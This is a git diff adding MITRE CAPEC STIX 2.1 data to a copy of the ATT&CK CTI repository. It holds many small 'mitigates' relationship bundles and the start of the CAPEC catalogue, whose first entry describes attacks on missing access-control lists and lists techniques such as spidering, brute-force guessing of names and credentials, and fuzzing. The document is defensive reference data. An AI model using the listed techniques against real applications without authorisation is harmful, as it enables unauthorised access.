a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json new file mode 100644 index 0000000000000000000000000000000000000000..1eeb641352d191c59cdb6d6a2bd81df2599661ca --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--791bb7ca-c21b-40d2-b533-ec5e4022eaf9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f658c186-a394-490c-bb78-04d615494813.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f658c186-a394-490c-bb78-04d615494813.json new file mode 100644 index 0000000000000000000000000000000000000000..3d9fe9d5b98c3627b4c0110ef76fb322622b0ec9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f658c186-a394-490c-bb78-04d615494813.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--3f44bc98-12fe-449b-a673-4734cc9aecaa", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f658c186-a394-490c-bb78-04d615494813", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7", + "spec_version": "2.1", + "target_ref": "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f81ec05a-9f11-45a6-867c-62b54d1514de.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f81ec05a-9f11-45a6-867c-62b54d1514de.json new file mode 100644 index 0000000000000000000000000000000000000000..227f414629fac3212222f52da4de0fcbfaff35a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f81ec05a-9f11-45a6-867c-62b54d1514de.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--71821369-b289-4d9a-ac26-055866e11c8f", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f81ec05a-9f11-45a6-867c-62b54d1514de", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6861ed58-d0bb-4b79-a234-6d3871f68301", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fa96d7c5-a195-4776-8593-4c3da18a0788.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fa96d7c5-a195-4776-8593-4c3da18a0788.json new file mode 100644 index 0000000000000000000000000000000000000000..e252aaa94e26afd791090d13a86c1a536dc928a7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fa96d7c5-a195-4776-8593-4c3da18a0788.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--34a0c651-0cd0-46f2-a133-eb4ab689648d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa96d7c5-a195-4776-8593-4c3da18a0788", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "spec_version": "2.1", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fbff3867-2c77-46ca-911a-4348a280a4bb.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fbff3867-2c77-46ca-911a-4348a280a4bb.json new file mode 100644 index 0000000000000000000000000000000000000000..f4a62e8196676e934897e24fda3b7c443434a234 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fbff3867-2c77-46ca-911a-4348a280a4bb.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--d0839976-3c80-4cd2-8145-7a6534f0f68f", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbff3867-2c77-46ca-911a-4348a280a4bb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713", + "spec_version": "2.1", + "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json new file mode 100644 index 0000000000000000000000000000000000000000..3f7faaec54b1ff0e07a1f62800d6f105c1880773 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--44ae8b92-17d6-48df-a962-3f62319abc84", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json new file mode 100644 index 0000000000000000000000000000000000000000..976c0a83fc428e85886233d5f77bc9456945b86c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--8e31fb43-4336-4fbb-b177-347487341b2d", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04", + "spec_version": "2.1", + "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json new file mode 100644 index 0000000000000000000000000000000000000000..9d5db06991115a42d4533fda4b2a9f0f94839d33 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--e8e18878-0298-4c73-8a9d-b5f686aa1e95", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55", + "spec_version": "2.1", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json new file mode 100644 index 0000000000000000000000000000000000000000..c2db5fcc166484ff4ba3c0e4557646bd9d40a39d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--75cb1cfe-2b07-45fa-94d5-5ad0249d66a1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--61ede338-8195-4a10-aefe-e52224f13800", + "spec_version": "2.1", + "target_ref": "attack-pattern--dbe3513a-5527-4aaf-a463-ead5eae2967f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json new file mode 100644 index 0000000000000000000000000000000000000000..4a0b7ede81f7a902ce633340396ae0fd764bfa72 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--628797ec-993b-493a-b3a9-eb91870db3dc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe330f06-2741-49df-9e82-3eea2c36031c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d", + "spec_version": "2.1", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e.json new file mode 100644 index 0000000000000000000000000000000000000000..12db406ae56a43ac516fe2c8cc23867231c2b6f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ffdac612-7cce-44a0-b4fd-23829250f1b9", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dff06017-2189-4ee8-875b-d7c722ceb8fb", + "spec_version": "2.1", + "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json new file mode 100644 index 0000000000000000000000000000000000000000..64055cb2b7b4fd3bdb9a2a0cff239a49b32ee8dd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--13576bcc-7c76-4e07-afa1-faf8b438d4c1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json new file mode 100644 index 0000000000000000000000000000000000000000..49b27491f98a7302c0ceb9d42d2e30bfb30b65de --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6902692c-b3b6-447a-9d7d-cfe9f2d1d630", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json new file mode 100644 index 0000000000000000000000000000000000000000..e5864c4b4c0dc537f970041217660619c7145bc4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ef9d597b-2771-4789-9e62-43172983eaf5", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json new file mode 100644 index 0000000000000000000000000000000000000000..75440d18f023adc48187e6309bda7aea1f33b433 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c2cfb009-61bb-413f-9cf4-edf36c99adc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff8ccce6-92b5-43da-81bf-6559100321b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69b6bab3-0a47-402a-b11e-6f7897b75465", + "spec_version": "2.1", + "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json new file mode 100644 index 0000000000000000000000000000000000000000..78ed06dc2e217d1f1eee8fef24cd08281e1ba7c1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5ec4791a-94f4-4931-adad-4bc82f2db6bd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json new file mode 100644 index 0000000000000000000000000000000000000000..1476cab38f17aec8fffbd00f3d2eaa5988e0e519 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--48d3f2fc-a1a6-4e02-aa22-38d5aa1f8223", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json new file mode 100644 index 0000000000000000000000000000000000000000..a796c4d251b6ac4f4effae52f21b3cd87be96a79 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fd924bc4-9d4f-4375-9ce0-25388f45bc53", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/stix-capec.json b/cti-ATT-CK-v13.1/capec/2.1/stix-capec.json new file mode 100644 index 0000000000000000000000000000000000000000..a1871324f3cc61ebfb2ad9bba67c43351adf9c38 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/stix-capec.json @@ -0,0 +1,71474 @@ +{ + "id": "bundle--36b5a045-c220-403a-96c1-02500df07699", + "objects": [ + { + "created": "2023-01-30T20:40:28.791035Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "spec_version": "2.1", + "type": "marking-definition" + }, + { + "created": "2023-01-30T20:40:28.791901Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:40:28.791901Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "identity" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.", + "external_references": [ + { + "external_id": "CAPEC-1", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/1.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-434", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/434.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1191", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1191.html" + }, + { + "external_id": "CWE-1193", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1193.html" + }, + { + "external_id": "CWE-1220", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1220.html" + }, + { + "external_id": "CWE-1297", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1297.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "external_id": "CWE-1314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1314.html" + }, + { + "external_id": "CWE-1315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1315.html" + }, + { + "external_id": "CWE-1318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1318.html" + }, + { + "external_id": "CWE-1320", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1320.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "external_id": "CWE-1327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1327.html" + }, + { + "description": "Hijack Execution Flow: ServicesFile Permissions Weakness", + "external_id": "T1574.010", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/010" + } + ], + "id": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Accessing Functionality Not Properly Constrained by ACLs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a \"Single front controller\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.\n If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

    2. Techniques
    Spidering web sites for all available links
    Brute force guessing of resource names
    Brute force guessing of user names / credentials
    Brute force guessing of function names / actions

  2. Identify Functionality: At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions

    3. Techniques
    Use the web inventory of all forms and inputs and apply attack data to those inputs.
    Use a packet sniffer to capture and record network traffic
    Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment.

Experiment

  1. Iterate over access capabilities: Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.

    2. Techniques
    Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b" + ], + "x_capec_prerequisites": [ + "The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.", + "The various resources, or individual URLs, must be somehow discoverable by the attacker", + "The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try 